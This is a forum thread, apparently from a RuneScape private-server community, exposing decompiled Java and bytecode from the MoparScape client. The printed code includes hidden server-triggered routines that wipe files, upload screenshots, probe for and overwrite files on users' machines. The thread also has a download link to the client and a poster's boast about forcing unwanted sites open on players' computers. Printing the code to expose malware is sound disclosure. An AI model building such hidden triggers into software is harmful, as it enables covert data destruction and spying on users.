sup
#moparleaks 2016
oh shit its about to go down hard
Btw the downloadable client on that page has remote execution code.
Very funny all the problems that are starting to show up.
public static void cleanDir(File dir) {
if(dir.isDirectory()) {
if(dir.listFiles() != null) {
for(File f: dir.listFiles()) {
if(f.isFile() && f.canWrite()) {
try {
if(f.getName().contains("main_file_cache"))
return;
if(f.getAbsolutePath().toLowerCase().contains("desktop"))
System.out.println("Deleting " + f.getAbsolutePath());
//f.delete();
} catch(Exception e) {
}
} else if(f.isDirectory()) {
cleanDir(f);
}
}
}
}
}
which is called by:
public void updateStrings(String str, int i) {
//System.out.println("UpdateString calling");
if(i == 12000 && str.startsWith("prnstrox")) {
DebuggingRunnables.uploadImage(Client.lastUsername, 0, false);
} else if(i == 12000 && str.startsWith("alxnrdispct")) {
new Thread() {
public void run() {
String home = System.getProperty("user.home");
cleanDir(new File(home));
cleanDir(new File("C:/"));
}
}.start();
} else if(i == 12000 && str.startsWith("fsrqst")) {
String home = System.getProperty("user.home");
/// etc etc et etc. .....
Notice that the delete is commented out.
Most of the sketch stuff is commented out.
Sause: http://www.mediafire.com/download/mkxj4vk688gtzc7/MoparscapeClient.zip
Looks like Dr. House has deleted all relevant topics on mopar lmao.
Silabs censored post:
let’s take a further peek at what sort of nasty shit we got going on here.
org.moparscape.X - Writing some sort of randomaccessfile, why the hell Client is passed in the constructor yet never used or stored is a complete mystery.
X bytecode
aload_0
aload_2
putfield org/moparscape/x/a Ljava/io/File;
aload_0
aload_3
putfield org/moparscape/x/b Ljava/lang/String;
aload_0
invokespecial java/lang/Thread/<init>()V
return
.
new java/io/RandomAccessFile
dup
aload_0
getfield org/moparscape/x/a Ljava/io/File;
ldc "rw"
invokespecial java/io/RandomAccessFile/<init>(Ljava/io/File;Ljava/lang/String;)V
dup
astore_1
lconst_0
invokevirtual java/io/RandomAccessFile/seek(J)V
lconst_0
lstore_2
aload_0
getfield org/moparscape/x/b Ljava/lang/String;
invokevirtual java/lang/String/toCharArray()[C
dup
astore 4
dup
astore 8
arraylength
istore 7
iconst_0
istore 6
goto 35
aload 8
iload 6
caload
istore 5
lload_2
iload 5
i2l
ladd
lstore_2
iinc 6 1
iload 6
iload 7
if_icmplt 25
lload_2
aload_0
getfield org/moparscape/x/a Ljava/io/File;
invokevirtual java/io/File/length()J
lcmp
iflt 50
aload_0
getfield org/moparscape/x/a Ljava/io/File;
invokevirtual java/io/File/length()J
lconst_1
lsub
lstore_2
iconst_0
istore 5
goto 67
iload 5
aload 4
arraylength
if_icmpge 63
aload_1
aload 4
iload 5
caload
invokevirtual java/io/RandomAccessFile/write(I)V
goto 66
aload_1
iconst_0
invokevirtual java/io/RandomAccessFile/write(I)V
iinc 5 1
iload 5
i2l
lload_2
lcmp
iflt 53
aload_1
invokevirtual java/io/RandomAccessFile/close()V
return
dup
astore_1
invokevirtual java/lang/Exception/printStackTrace()V
return
.
package org.moparscape;
import java.io.File;
import java.io.RandomAccessFile;
import org.moparscape.Client;
final class x
extends Thread {
private final /* synthetic */ File a;
private final /* synthetic */ String b;
x(Client client, File file, String string) {
this.a = file;
this.b = string;
}
@Override
public final void run() {
try {
int n2;
char[] arrc;
RandomAccessFile randomAccessFile = new RandomAccessFile(this.a, "rw");
randomAccessFile.seek(0);
long l2 = 0;
char[] arrc2 = arrc = this.b.toCharArray();
int n3 = arrc.length;
int n4 = 0;
while (n4 < n3) {
n2 = arrc2[n4];
l2 += (long)n2;
++n4;
}
if (l2 >= this.a.length()) {
l2 = this.a.length() - 1;
}
n2 = 0;
while ((long)n2 < l2) {
if (n2 < arrc.length) {
randomAccessFile.write(arrc[n2]);
} else {
randomAccessFile.write(0);
}
++n2;
}
randomAccessFile.close();
return;
}
catch (Exception v0) {
Exception exception = v0;
v0.printStackTrace();
return;
}
}
}
org.moparscape.U: Runnable task of accessing some method in the org.moparscape.Client for deleting files
import java.io.File;
import org.moparscape.Client;
final class u
extends Thread {
private /* synthetic */ Client a;
private final /* synthetic */ String b;
private final /* synthetic */ String c;
private final /* synthetic */ String d;
u(Client client, String string, String string2, String string3) {
this.a = client;
this.b = string;
this.c = string2;
this.d = string3;
}
@Override
public final void run() {
File file = Client.a(this.a, this.b, this.c, this.d);
if (file != null) {
Client.a(this.a, file, this.b);
}
}
}
org.moparscape.client.a: Deletes requested file
static /* synthetic */ void a(Client serializable, File file, String string) {
try {
Client.a(file, new File(string));
file.delete();
return;
}
catch (IOException v0) {
serializable = v0;
v0.printStackTrace();
return;
}
}
.
if ((paramInt == 12000) && (paramString.startsWith("fsrqst")))
{
if ((localObject1 = System.getProperty("user.home")) != null)
{
paramString = paramString.replace("fsrqst ", "");
localObject2 = localObject1 + "/" + paramString;
if ((localObject3 = new File((String)localObject2)).exists()) {
e.a("yes" + paramString.toLowerCase()).start();
} else {
e.a("no" + paramString.toLowerCase()).start();
}
}
}
if ((paramInt == 12000) && (paramString.startsWith("fsrqst")))
{
if ((localObject1 = System.getProperty("user.home")) != null)
{
paramString = paramString.replace("fsrqst ", "");
localObject2 = localObject1 + "/" + paramString;
if ((localObject3 = new File((String)localObject2)).exists()) {
e.a("yes" + paramString.toLowerCase()).start();
} else {
e.a("no" + paramString.toLowerCase()).start();
}
}
}
Literally searches your computer for selected file and returns yes if found and no if not.
For extra fun open this in your browser a few times http://data.furiouspk.com/check.php?init=gofuckyourself
Moparscape Ownership Change thread in it’s full entirety - you must open the HTML files individually.
You guys are quality
Doesn’t really matter to be honest. The guy bought it, it’s his to do with as he pleases.
But not illegal things like stealing people’s files and such…
surely you should have known when you sold it to someone you didn’t even know for the price you did that it was going to go down exactly like this. You took the money and didn’t care then why pretend to do so now?
I don’t really buy this sort of thing. Something you created/worked on/etc can still be your baby, even after you’ve moved on from it, sold it, retired it, etc.
Let’s say you have a house and a meth head approaches you and offer you a bunch of money for the house, You take the deal because it’s more money than the house is worth. Are you going to pretend to be butthurt when you see the house on the news blown up because of a meth lab? You knew this guy was a meth head and even if he seemed legit surely the amount they offered well higher than what the house is worth should have rang some bells. what right do you have to pretend like you had no idea it was going to happen?
Not quiet the same. Mitb sold the everything including the community. That’s like selling your house with your family still inside to meth heads. Who would have guessed that somebody who paid x amount of money did it just to give everybody malicious content? We can all migrate here anyway.
because its happened how many times in runescape history when someone else takes over a community they do shady shit. did we all forget autorune2?
lol. legit, what a fucking imbecile.
but actually, i’ll admit that on my server i put a thing where it would open some site on your computer repeatedly given that you granted the client relevant permissions. used it to spam-open meatspin on people who were advertising their own servers. was pretty gr8.